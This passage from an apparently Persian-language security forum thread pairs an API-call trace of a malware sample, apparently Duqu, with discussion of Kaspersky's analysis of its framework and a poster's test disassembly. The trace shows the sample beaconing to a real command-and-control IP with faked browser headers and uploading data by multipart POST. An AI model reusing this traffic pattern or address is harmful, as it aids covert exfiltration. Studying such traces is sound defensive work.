                      170	376	sortE554.nls	WSAEnumNetworkEvents ( 348, 0x00000160, 0x016dfd44	0	
                      171	376	sortE554.nls	send ( 348, 0x016dda78, 136, 0	136	
                      172	376	sortE554.nls	WSAEnumNetworkEvents ( 348, 0x00000160, 0x016dfd44	0	
                      173	376	sortE554.nls	recv ( 348, 0x016ddd2c, 8192, 0	SOCKET_ERROR	10054 = An existing connection was forcibly closed by the remote host. 
                      174	376	sortE554.nls	closesocket ( 348	0	
                      175	376	sortE554.nls	WinHttpCheckPlatform ( 	TRUE	
                      176	376	sortE554.nls	WinHttpOpen ( "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 (.NET CLR 3.5.30729)", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, NULL, NULL, WINHTTP_FLAG_ASYNC	0x01b04100	
                      177	376	sortE554.nls	WinHttpSetTimeouts ( 0x01b04100, 60000, 60000, 60000, 0	TRUE	
                      178	376	sortE554.nls	WinHttpSetOption ( 0x01b04100, WINHTTP_OPTION_CONTEXT_VALUE, 0x016df94c, 4	TRUE	
                      179	376	sortE554.nls	WinHttpSetStatusCallback ( 0x01b04100, 0x010ae6d2, WINHTTP_CALLBACK_FLAG_ALL_COMPLETIONS | WINHTTP_CALLBACK_FLAG_CLOSE_CONNECTION | WINHTTP_CALLBACK_FLAG_CONNECT_TO_SERVER | WINHTTP_CALLBACK_FLAG_DETECTING_PROXY | WINHTTP_CALLBACK_FLAG_INTERMEDIATE_RESPONSE | WINHTTP_CALLBACK_FLAG_REDIRECT | WINHTTP_CALLBACK_, 0	NULL	0 = The operation completed successfully. 
                      180	376	sortE554.nls	WinHttpConnect ( 0x01b04100, "206.183.111.97", INTERNET_DEFAULT_HTTP_PORT, 0	0x01b04000	
                      181	376	winhttp.dll	WSAStringToAddressW ( "206.183.111.97", AF_INET, NULL, 0x016df76c, 0x016df768	0	
                      182	376	winhttp.dll	WSAStringToAddressA ( "206.183.111.97", AF_INET, NULL, 0x016df740, 0x016df73c	0	
                      183	376	sortE554.nls	WinHttpSetOption ( 0x01b04000, WINHTTP_OPTION_CONTEXT_VALUE, 0x016df8f0, 4	TRUE	
                      184	376	sortE554.nls	WinHttpSetStatusCallback ( 0x01b04000, 0x010ae6d2, WINHTTP_CALLBACK_FLAG_ALL_COMPLETIONS | WINHTTP_CALLBACK_FLAG_CLOSE_CONNECTION | WINHTTP_CALLBACK_FLAG_CONNECT_TO_SERVER | WINHTTP_CALLBACK_FLAG_DETECTING_PROXY | WINHTTP_CALLBACK_FLAG_INTERMEDIATE_RESPONSE | WINHTTP_CALLBACK_FLAG_REDIRECT | WINHTTP_CALLBACK_, 0	0x010ae6d2	
                      185	376	sortE554.nls	WinHttpOpenRequest ( 0x01b04000, "GET", "/", "HTTP/1.1", NULL, NULL, WINHTTP_FLAG_BYPASS_PROXY_CACHE	0x01c30000	
                      186	376	sortE554.nls	WinHttpSetOption ( 0x01c30000, WINHTTP_OPTION_AUTOLOGON_POLICY, 0x016df63c, 4	TRUE	
                      187	376	sortE554.nls	WinHttpSetOption ( 0x01c30000, WINHTTP_OPTION_CONTEXT_VALUE, 0x016df624, 4	TRUE	
                      188	376	sortE554.nls	WinHttpSetStatusCallback ( 0x01c30000, 0x010ae6d2, WINHTTP_CALLBACK_FLAG_ALL_COMPLETIONS | WINHTTP_CALLBACK_FLAG_CLOSE_CONNECTION | WINHTTP_CALLBACK_FLAG_CONNECT_TO_SERVER | WINHTTP_CALLBACK_FLAG_DETECTING_PROXY | WINHTTP_CALLBACK_FLAG_INTERMEDIATE_RESPONSE | WINHTTP_CALLBACK_FLAG_REDIRECT | WINHTTP_CALLBACK_, 0	0x010ae6d2	
                      189	376	sortE554.nls	WinHttpAddRequestHeaders ( 0x01c30000, "****ie: PHPSESSID=sbxcxi1of686g0gkihg120013i", 4294967295, WINHTTP_ADDREQ_FLAG_ADD | WINHTTP_ADDREQ_FLAG_REPLACE	TRUE	
                      190	376	sortE554.nls	WinHttpAddRequestHeaders ( 0x01c30000, "Cache-Control: no-cache", 4294967295, WINHTTP_ADDREQ_FLAG_ADD | WINHTTP_ADDREQ_FLAG_REPLACE	TRUE	
                      191	376	sortE554.nls	WinHttpAddRequestHeaders ( 0x01c30000, "Pragma: no-cache", 4294967295, WINHTTP_ADDREQ_FLAG_ADD | WINHTTP_ADDREQ_FLAG_REPLACE	TRUE	
                      192	376	sortE554.nls	WinHttpSendRequest ( 0x01c30000, NULL, 0, NULL, 0, 0, 0	TRUE	
                      193	376	winhttp.dll	socket ( AF_INET, SOCK_DGRAM, IPPROTO_UDP	304	
                      194	376	winhttp.dll	htonl ( 2130706433	16777343	
                      195	376	winhttp.dll	bind ( 304, 0x016df758, 16	0	
                      196	376	wshtcpip.dll	htonl ( 2130706433	16777343	
                      197	376	hnetcfg.dll	getsockname ( 304, 0x016df51c, 0x016df514	0	
                      198	376	hnetcfg.dll	ntohl ( 16777343	2130706433	
                      199	376	winhttp.dll	getsockname ( 304, 0x016df748, 0x016df740	0	
                      200	376	winhttp.dll	connect ( 304, 0x016df748, 16	0	
                      201	376	wshtcpip.dll	htonl ( 2130706433	16777343	
                      202	376	wshtcpip.dll	ntohs ( 5124	1044	
                      203	376	sortE554.nls	WinHttpCheckPlatform ( 	TRUE	
                      204	452	winhttp.dll	select ( 1, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      205	472	winhttp.dll	getaddrinfo ( "206.183.111.97", NULL, 0x01e4f3c0, 0x01e4f40c	0	
                      206	472	winhttp.dll	freeaddrinfo ( 0x0035b7f8		
                      207	472	winhttp.dll	inet_ntoa ( { S_un = { S_un_b = { s_b1 = 206, s_b2 = 183, s_b3 = 111  ...}, S_un_w = { s_w1 = 47054, s_w2 = 24943 }, S_addr = 1634711502 } }	0x002ba044	
                      208	472	winhttp.dll	htons ( 80	20480	
                      209	472	winhttp.dll	ntohs ( 20480	80	
                      210	472	winhttp.dll	socket ( AF_INET, SOCK_STREAM, IPPROTO_TCP	328	
                      211	472	winhttp.dll	inet_ntoa ( { S_un = { S_un_b = { s_b1 = 206, s_b2 = 183, s_b3 = 111  ...}, S_un_w = { s_w1 = 47054, s_w2 = 24943 }, S_addr = 1634711502 } }	0x002ba044	
                      212	376	sortE554.nls	WinHttpOpen ( "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 (.NET CLR 3.5.30729)", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, NULL, NULL, WINHTTP_FLAG_ASYNC	0x01b04400	
                      213	376	sortE554.nls	WinHttpSetTimeouts ( 0x01b04400, 60000, 60000, 60000, 0	TRUE	
                      214	376	sortE554.nls	WinHttpSetOption ( 0x01b04400, WINHTTP_OPTION_CONTEXT_VALUE, 0x016df94c, 4	TRUE	
                      215	376	sortE554.nls	WinHttpSetStatusCallback ( 0x01b04400, 0x010ae6d2, WINHTTP_CALLBACK_FLAG_ALL_COMPLETIONS | WINHTTP_CALLBACK_FLAG_CLOSE_CONNECTION | WINHTTP_CALLBACK_FLAG_CONNECT_TO_SERVER | WINHTTP_CALLBACK_FLAG_DETECTING_PROXY | WINHTTP_CALLBACK_FLAG_INTERMEDIATE_RESPONSE | WINHTTP_CALLBACK_FLAG_REDIRECT | WINHTTP_CALLBACK_, 0	NULL	0 = The operation completed successfully. 
                      216	376	sortE554.nls	WinHttpConnect ( 0x01b04400, "206.183.111.97", INTERNET_DEFAULT_HTTP_PORT, 0	0x01b04300	
                      217	376	winhttp.dll	WSAStringToAddressW ( "206.183.111.97", AF_INET, NULL, 0x016df76c, 0x016df768	0	
                      218	376	winhttp.dll	WSAStringToAddressA ( "206.183.111.97", AF_INET, NULL, 0x016df740, 0x016df73c	0	
                      219	376	sortE554.nls	WinHttpSetOption ( 0x01b04300, WINHTTP_OPTION_CONTEXT_VALUE, 0x016df8f0, 4	TRUE	
                      220	376	sortE554.nls	WinHttpSetStatusCallback ( 0x01b04300, 0x010ae6d2, WINHTTP_CALLBACK_FLAG_ALL_COMPLETIONS | WINHTTP_CALLBACK_FLAG_CLOSE_CONNECTION | WINHTTP_CALLBACK_FLAG_CONNECT_TO_SERVER | WINHTTP_CALLBACK_FLAG_DETECTING_PROXY | WINHTTP_CALLBACK_FLAG_INTERMEDIATE_RESPONSE | WINHTTP_CALLBACK_FLAG_REDIRECT | WINHTTP_CALLBACK_, 0	0x010ae6d2	
                      221	376	sortE554.nls	WinHttpOpenRequest ( 0x01b04300, "POST", "/", "HTTP/1.1", NULL, NULL, WINHTTP_FLAG_BYPASS_PROXY_CACHE	0x01c30400	
                      222	376	sortE554.nls	WinHttpSetOption ( 0x01c30400, WINHTTP_OPTION_AUTOLOGON_POLICY, 0x016df63c, 4	TRUE	
                      223	376	sortE554.nls	WinHttpSetOption ( 0x01c30400, WINHTTP_OPTION_CONTEXT_VALUE, 0x016df624, 4	TRUE	
                      224	376	sortE554.nls	WinHttpSetStatusCallback ( 0x01c30400, 0x010ae6d2, WINHTTP_CALLBACK_FLAG_ALL_COMPLETIONS | WINHTTP_CALLBACK_FLAG_CLOSE_CONNECTION | WINHTTP_CALLBACK_FLAG_CONNECT_TO_SERVER | WINHTTP_CALLBACK_FLAG_DETECTING_PROXY | WINHTTP_CALLBACK_FLAG_INTERMEDIATE_RESPONSE | WINHTTP_CALLBACK_FLAG_REDIRECT | WINHTTP_CALLBACK_, 0	0x010ae6d2	
                      225	376	sortE554.nls	WinHttpAddRequestHeaders ( 0x01c30400, "****ie: PHPSESSID=sbxcxi1vbcq6gg0530gh2g10j2", 4294967295, WINHTTP_ADDREQ_FLAG_ADD | WINHTTP_ADDREQ_FLAG_REPLACE	TRUE	
                      226	376	sortE554.nls	WinHttpAddRequestHeaders ( 0x01c30400, "Cache-Control: no-cache", 4294967295, WINHTTP_ADDREQ_FLAG_ADD | WINHTTP_ADDREQ_FLAG_REPLACE	TRUE	
                      227	376	sortE554.nls	WinHttpAddRequestHeaders ( 0x01c30400, "Pragma: no-cache", 4294967295, WINHTTP_ADDREQ_FLAG_ADD | WINHTTP_ADDREQ_FLAG_REPLACE	TRUE	
                      228	376	sortE554.nls	WinHttpAddRequestHeaders ( 0x01c30400, "Content-Type: multipart/form-data; boundary=---------------------------29c03d5eaa13c1", 4294967295, WINHTTP_ADDREQ_FLAG_ADD | WINHTTP_ADDREQ_FLAG_REPLACE	TRUE	
                      229	472	winhttp.dll	ioctlsocket ( 328, -2147195266, 0x01e4f488	0	
                      230	472	winhttp.dll	bind ( 328, 0x01f770b8, 16	0	
                      231	472	winhttp.dll	getsockname ( 328, 0x01e4f400, 0x01e4f3fc	0	
                      232	472	winhttp.dll	ntohs ( 5380	1045	
                      233	472	winhttp.dll	connect ( 328, 0x01f770c8, 16	SOCKET_ERROR	10035 = A non-blocking socket operation could not be completed immediately. 
                      234	472	winhttp.dll	WSAGetLastError ( 	10035	
                      235	472	winhttp.dll	send ( 304, 0x4d53e0a0, 1, 0	1	
                      236	452	winhttp.dll	recv ( 304, 0x01d4ff08, 32, 0	1	
                      237	452	winhttp.dll	select ( 2, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      238	452	winhttp.dll	select ( 1, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      239	472	winhttp.dll	setsockopt ( 328, IPPROTO_TCP, TCP_NODELAY, 0x01e4fea8, 4	0	
                      240	472	winhttp.dll	inet_ntoa ( { S_un = { S_un_b = { s_b1 = 206, s_b2 = 183, s_b3 = 111  ...}, S_un_w = { s_w1 = 47054, s_w2 = 24943 }, S_addr = 1634711502 } }	0x002ba044	
                      241	472	winhttp.dll	setsockopt ( 328, SOL_SOCKET, SO_SNDTIMEO, 0x01e4fe9c, 4	0	
                      242	472	winhttp.dll	setsockopt ( 328, SOL_SOCKET, SO_RCVTIMEO, 0x01e4fe9c, 4	0	
                      243	472	winhttp.dll	setsockopt ( 328, SOL_SOCKET, SO_LINGER, 0x01e4fe98, 4	0	
                      244	472	winhttp.dll	WSASend ( 328, 0x01e4fe20, 1, 0x01e4fe30, 0, NULL, NULL	0	
                      245	376	sortE554.nls	WinHttpReceiveResponse ( 0x01c30000, NULL	TRUE	
                      246	472	winhttp.dll	WSARecv ( 328, 0x01e4fd94, 1, 0x01e4fdac, 0x01e4fda4, NULL, NULL	SOCKET_ERROR	10035 = A non-blocking socket operation could not be completed immediately. 
                      247	472	winhttp.dll	WSARecv ( 328, 0x01e4fd94, 1, 0x01e4fdac, 0x01e4fda4, 0x01f72018, NULL	SOCKET_ERROR	997 = Overlapped I/O operation is in progress. 
                      248	472	winhttp.dll	WSAGetLastError ( 	997	
                      249	376	sortE554.nls	WinHttpSendRequest ( 0x01c30400, NULL, 0, 0x01b24050, 990, 990, 0	TRUE	
                      250	472	winhttp.dll	getaddrinfo ( "206.183.111.97", NULL, 0x01e4f3c0, 0x01e4f40c	0	
                      251	472	winhttp.dll	freeaddrinfo ( 0x00358760		
                      252	472	winhttp.dll	inet_ntoa ( { S_un = { S_un_b = { s_b1 = 206, s_b2 = 183, s_b3 = 111  ...}, S_un_w = { s_w1 = 47054, s_w2 = 24943 }, S_addr = 1634711502 } }	0x002ba044	
                      253	472	winhttp.dll	htons ( 80	20480	
                      254	472	winhttp.dll	ntohs ( 20480	80	
                      255	472	winhttp.dll	socket ( AF_INET, SOCK_STREAM, IPPROTO_TCP	376	
                      256	472	winhttp.dll	inet_ntoa ( { S_un = { S_un_b = { s_b1 = 206, s_b2 = 183, s_b3 = 111  ...}, S_un_w = { s_w1 = 47054, s_w2 = 24943 }, S_addr = 1634711502 } }	0x002ba044	
                      257	472	winhttp.dll	ioctlsocket ( 376, -2147195266, 0x01e4f488	0	
                      258	472	winhttp.dll	bind ( 376, 0x01f770b8, 16	0	
                      259	472	winhttp.dll	getsockname ( 376, 0x01e4f400, 0x01e4f3fc	0	
                      260	472	winhttp.dll	ntohs ( 5636	1046	
                      261	472	winhttp.dll	connect ( 376, 0x01f770c8, 16	SOCKET_ERROR	10035 = A non-blocking socket operation could not be completed immediately. 
                      262	472	winhttp.dll	WSAGetLastError ( 	10035	
                      263	472	winhttp.dll	send ( 304, 0x4d53e0a0, 1, 0	1	
                      264	452	winhttp.dll	recv ( 304, 0x01d4ff08, 32, 0	1	
                      265	452	winhttp.dll	select ( 2, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      266	452	winhttp.dll	select ( 1, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      267	472	winhttp.dll	setsockopt ( 376, IPPROTO_TCP, TCP_NODELAY, 0x01e4fea8, 4	0	
                      268	472	winhttp.dll	inet_ntoa ( { S_un = { S_un_b = { s_b1 = 206, s_b2 = 183, s_b3 = 111  ...}, S_un_w = { s_w1 = 47054, s_w2 = 24943 }, S_addr = 1634711502 } }	0x002ba044	
                      269	472	winhttp.dll	setsockopt ( 376, SOL_SOCKET, SO_SNDTIMEO, 0x01e4fe9c, 4	0	
                      270	472	winhttp.dll	setsockopt ( 376, SOL_SOCKET, SO_RCVTIMEO, 0x01e4fe9c, 4	0	
                      271	472	winhttp.dll	setsockopt ( 376, SOL_SOCKET, SO_LINGER, 0x01e4fe98, 4	0	
                      272	472	winhttp.dll	WSASend ( 376, 0x01e4fe20, 1, 0x01e4fe30, 0, NULL, NULL	0	
                      273	472	winhttp.dll	WSASend ( 376, 0x01e4fe20, 1, 0x01e4fe30, 0, NULL, NULL	0	
                      274	376	sortE554.nls	WinHttpReceiveResponse ( 0x01c30400, NULL	TRUE	
                      275	472	winhttp.dll	WSARecv ( 376, 0x01e4fd94, 1, 0x01e4fdac, 0x01e4fda4, NULL, NULL	SOCKET_ERROR	10035 = A non-blocking socket operation could not be completed immediately. 
                      276	472	winhttp.dll	WSARecv ( 376, 0x01e4fd94, 1, 0x01e4fdac, 0x01e4fda4, 0x01f72048, NULL	SOCKET_ERROR	997 = Overlapped I/O operation is in progress. 
                      277	472	winhttp.dll	WSAGetLastError ( 	997	
                      278	472	winhttp.dll	setsockopt ( 328, SOL_SOCKET, SO_LINGER, 0x01e4fe64, 4	0	
                      279	472	winhttp.dll	closesocket ( 328	0	
                      280	376	sortE554.nls	WinHttpQueryOption ( 0x01c30400, WINHTTP_OPTION_CONTEXT_VALUE, 0x016dfa28, 0x016dfa24	TRUE	
                      281	376	sortE554.nls	WinHttpCloseHandle ( 0x01c30400	TRUE	
                      282	376	winhttp.dll	closesocket ( 376	0	
                      283	376	winhttp.dll	send ( 304, 0x4d53e0a0, 1, 0	1	
                      284	452	winhttp.dll	recv ( 304, 0x01d4ff08, 32, 0	1	
                      285	452	winhttp.dll	select ( 1, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      286	376	sortE554.nls	WinHttpQueryOption ( 0x01b04300, WINHTTP_OPTION_CONTEXT_VALUE, 0x016dfa28, 0x016dfa24	TRUE	
                      287	376	sortE554.nls	WinHttpCloseHandle ( 0x01b04300	TRUE	
                      288	376	winhttp.dll	send ( 304, 0x4d53e0a0, 1, 0	1	
                      289	452	winhttp.dll	recv ( 304, 0x01d4ff08, 32, 0	1	
                      290	452	winhttp.dll	select ( 1, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      291	376	sortE554.nls	WinHttpQueryOption ( 0x01b04400, WINHTTP_OPTION_CONTEXT_VALUE, 0x016dfa28, 0x016dfa24	TRUE	
                      292	376	sortE554.nls	WinHttpCloseHandle ( 0x01b04400	TRUE	
                      293	376	winhttp.dll	send ( 304, 0x4d53e0a0, 1, 0	1	
                      294	452	winhttp.dll	recv ( 304, 0x01d4ff08, 32, 0	1	
                      295	452	winhttp.dll	select ( 1, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      296	376	sortE554.nls	WinHttpQueryOption ( 0x01c30000, WINHTTP_OPTION_CONTEXT_VALUE, 0x016dfb10, 0x016dfb0c	TRUE	
                      297	376	sortE554.nls	WinHttpCloseHandle ( 0x01c30000	TRUE	
                      298	376	winhttp.dll	send ( 304, 0x4d53e0a0, 1, 0	1	
                      299	452	winhttp.dll	recv ( 304, 0x01d4ff08, 32, 0	1	
                      300	452	winhttp.dll	select ( 1, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      301	376	sortE554.nls	WinHttpQueryOption ( 0x01b04000, WINHTTP_OPTION_CONTEXT_VALUE, 0x016dfb10, 0x016dfb0c	TRUE	
                      302	376	sortE554.nls	WinHttpCloseHandle ( 0x01b04000	TRUE	
                      303	376	winhttp.dll	send ( 304, 0x4d53e0a0, 1, 0	1	
                      304	452	winhttp.dll	recv ( 304, 0x01d4ff08, 32, 0	1	
                      305	452	winhttp.dll	select ( 1, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      306	376	sortE554.nls	WinHttpQueryOption ( 0x01b04100, WINHTTP_OPTION_CONTEXT_VALUE, 0x016dfb10, 0x016dfb0c	TRUE	
                      307	376	sortE554.nls	WinHttpCloseHandle ( 0x01b04100	TRUE	
                      308	376	winhttp.dll	send ( 304, 0x4d53e0a0, 1, 0	1	
                      309	452	winhttp.dll	recv ( 304, 0x01d4ff08, 32, 0	1	
                      310	452	winhttp.dll	select ( 1, 0x01b0f0b0, 0x01b0f4b4, 0x01b0f8b8, 0x01d4ff78	1	
                      311	472	winhttp.dll	send ( 304, 0x4d53e0a0, 1, 0	1	
                      312	452	winhttp.dll	closesocket ( 304	0
                      فایل های پیوست شده
                      Last edited by BioHazard; 03-14-2012, 02:55 AM.
                      Shabgard становится полностью дерьмо

                      Comment


                      • #12
                        با امروز ميشه 6 روز كه پيگير اين خبر و نوشته هاي Igor Soumenkov هستم. تموم كامنتها رو دارم اين چند روزه ميخونم ، Igor Soumenkov كسي نيست كه بشه براحتي زير سوال بردش. اينا هم ادعا ندارن حتما زبان جديدي استفاده شده، چيزي كه با اطمينان 100 درصد گفتن اينه كه قسمت Duqu Framework با ويژوال سي نوشته نشده.

                        After having performed countless hours of analysis, we are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language

                        لينك كامل از كاسپر:

                        Comment


                        • #13
                          والا من نخواستم ایشونو ببرم زیر سوال . نظرمو گفتم. الان هم یک تیکه کد زدم ، اسمبلیش شبیه همونی شد که ایشون توی بلاگ گذاشته. چیزی که هست ، من خودم شخصا دنبال دلیل باید باشم تا بهم ثابت بشه ، حرف اینا درست ، ولی چیزی که هست و برام تا حدی غیرمنطقیه باید بهم ثابت بشه. اینم disassemble شده کد من . دقیق همون نیست ولی باهاش وربرم میتونم همونو تولید کنم.


                          کد:
                          push    0A0h            ; unsigned int
                          call    new;
                          add     esp, 4
                          mov     [ebp+var_D4], eax
                          mov     eax, [ebp+var_D4]
                          mov     [ebp+dq_call], eax
                          mov     eax, [ebp+dq_call]
                          mov     dword ptr [eax], offset j_?a@@YAXXZ ; 
                          mov     eax, [ebp+dq_call]
                          mov     dword ptr [eax+4], offset j_?b@@YAXXZ ; 
                          mov     eax, [ebp+dq_call]
                          mov     dword ptr [eax+8], offset j_?c@@YAXXZ ; 
                          mov     eax, [ebp+dq_call]
                          mov     dword ptr [eax+0Ch], offset j_?d@@YAXXZ ; )
                          Last edited by BioHazard; 03-14-2012, 08:04 AM.
                          Shabgard становится полностью дерьмо

                          Comment


                          • #14
                            نميدونم چرا مهندسين ida كمكي نكردن(شايد اونا هم همچين چيزي نديدن). داستان جالبيه بهرحال، آخرش كلاغه به خونش ميرسه ولي ايگور به جايي نميرسه

                            Comment


                            • #15
                              راستشو بخوای من سردرد بدی دارم ، ننتونستم کل وبلاگ رو بخونم.ولی عکسی که بود بیشتر شبیه پیاده سازی توابع بود. operator new ، نتیجه اش رو توی ثبات eax برمیگردونه. بعدش مقدار دهی ساختار...... والا چیزی که هست همینه و دارم کدی میزنم که دقیق بشه همونی که تو عکس و فایل اتچ هست.

                              بیشتر شبیه کاری میشه که برای detour patch میکنیم. یک تابع مینویسیم به اسمبلی بعد اونو تزریق میکنیم.

                              فکر کنم دارم حرف 4n0nym0us رو تکرار میکنم ولی خوب باید برای حرفم دلیل داشته باشم.
                              Shabgard становится полностью дерьмо

                              Comment

                              Working...
                              X